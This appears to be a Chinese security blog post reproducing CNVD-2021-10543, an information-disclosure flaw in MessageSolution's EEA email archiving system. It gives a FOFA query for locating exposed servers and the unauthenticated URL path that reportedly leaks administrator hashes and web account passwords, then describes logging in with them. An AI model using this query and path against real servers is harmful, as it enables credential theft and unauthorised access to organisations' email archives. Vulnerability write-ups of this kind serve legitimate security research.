0x01 前言
MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。
0x02 漏洞影响
MessageSolution 企业邮件归档管理系统EEA
0x03 漏洞复现
FOFA语句
title="MessageSolution Enterprise Email Archiving (EEA)"
PAYLOAD:
http://ip/authenticationserverservlet/
直接访问如下,会看到泄露的账号密码
利用泄露的账号密码登录系统
验证脚本
0x04 参考链接
https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ【往期推荐】
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
本文始发于微信公众号(洞见网安):【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论